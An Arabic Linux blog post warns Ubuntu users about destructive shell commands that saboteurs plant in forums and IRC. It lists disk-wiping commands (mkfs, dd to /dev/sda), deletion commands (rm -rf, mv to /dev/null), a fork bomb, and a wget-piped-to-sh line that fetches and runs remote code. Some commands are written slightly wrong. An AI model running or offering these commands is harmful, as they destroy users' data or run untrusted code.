الرئيسية / شروحات توزيعات لينكس / توزيعة ابنتو / اوامر خطيرة يجب الحذر منها لمستعملين الليينوكس

اوامر خطيرة يجب الحذر منها لمستعملين الليينوكس

كما هو معلوم ان اي نظام تشغيل ليس محمي بشكل كامل ولكن الميزه فيانظمة لينوكس ان الفيروسات المصنعه والمشهوره ليست مصنعه لتعمل على لينوكس لذالك نادر جدا ما تصادف فيروس يعمل على لنظام لينوكس ،ويعد نظام اللينكس الأكثر آماناً بين الأنظمة الأخرى المنافسة كالويندوز ونسبة وصول الفيروسات إلى نظام لينكس ظئيلة جداً بل إقرب إلى أن تكون منعدمة! عكس نظام الويندوز الذي ثبت أن أكثر من نصف الاجهزة التى تعمل بنظام الويندوز مصابة بالفيروسات.

لكن بعض المخربين لديهم بعض الحيل ومنها ان يقوم احد المخربين بوضع بعض الاومر الخطيرة فى المنتديات او على قنوات الدردشة IRC هدفها تدميرالنضام
بالكامل فوجب الحذر و معرفة الية عمل هده الاوامر حتى نتفادى استعمالها بدون سابق معرفة .

 

الامر mkfs يستعمل لفرمطة الاقراص الصلبة لكن عند اضافته للامر التالي يقوم بمسح جميع بيانات القرص الصلب.

$ mkfs
$ mkfs.ext3 /dev/sda

الامر rm -rf : هذا الامر يقوم ببساطة بمسح جميع ملفات الموجودة على القرص الصلب مع استحالة استرجاعها في وقت لاحق.

$ /rm -rf

الامر :: (){:|:&};: هدا الامر يعتبر قنبلة شائكة بحيث بمجرد تطبيق هدا الامر سيضطر النضام الى انشاء عمليات متسلسلة الى غاية تشبع الذاكرة مما يضطرك الى الايقاف الفوري للجهاز الذي ينجم عنه دمار نضام التشغيل.

$ :: (){:|:&};

الامر mv ~/* /dev/null : تحريك ملف او اي شيء الى /dev/null هو بمثابة تقل الى سلة المحذوفات النهائية اي اي ملف يتم توجيهه الى /dev/null سيحذف نهائيا دون امكانية استرجاعه مرة اخرى.

$ mv ~/* /dev/null

الامر dd if=/dev/zero of=/dev/sda: هدا الامر يقوم بكتابة اصفار في جميع كتل القرص الصلب ويسبب الفقدان التام للبيانات الموجودة على القرص كانك قمت بالفرمطة.

$ dd if=/dev/zero of=/dev/sda
$ :(){:|:&};:
$ mv /home/user/* /dev/null
$ wget http://malicious_source -O- | sh
$ mkfs.ext3 /dev/sda
$ > file
$ ^foo^bar
$ dd if=/dev/random of=/dev/sda
$ mkfs.ext3 /dev/sda
$ any_command > /dev/sda
$ mv /home/yourhomedirectory/* /dev/null

عن fouad

احاول من خلال مدونتي البسيطة التى نادرا ما اجد الوقت للكتابة نشر مبادئ حركة البرمجيات الحرة والتى هدفها ضمان الحريات الأربع الأساسية لمستخدمي البرمجيات: حرية تشغيل البرمجيات, دراستها وتغييرها, وتوزيع نسخ منها مع تعديلات أو بدون تعديلات. ,ونشر فلسفة الحركة هي إعطاء مستخدمي الحاسوب الحرية عن طريق استبدال البرمجيات الاحتكارية بالبرمجيات الحرة.
Optimization WordPress Plugins & Solutions by W3 EDGE